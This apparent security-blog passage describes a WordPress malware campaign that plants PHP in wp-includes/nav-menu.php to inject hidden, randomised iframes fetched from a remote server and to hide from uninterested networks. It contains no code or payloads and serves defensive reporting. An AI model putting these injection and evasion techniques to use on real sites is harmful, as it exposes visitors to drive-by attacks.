Last March we described a WordPress attack that was responsible for hidden iframe injections that resembled Darkleech injections: declarations of styles with random names and coordinates, iframes with No-IP host names, and random dimensions where the random parts changed on every page load.
Back then, we identified that it was not a server-level infection. The malicious PHP code was injected into the wp-includes/nav-menu.php file. It fetched the actual iframe code on the fly from a remote server.
Since then, we’ve been regularly cleaning sites infected with this malware. While the PHP code in the wp-includes/nav-menu.php file didn’t change much, the site visitor facing part of this attack has changed significantly.
First of all, the attack became stealthier. It won’t reveal itself if a request comes from any of the networks (including whole countries) that the attackers are not interested in.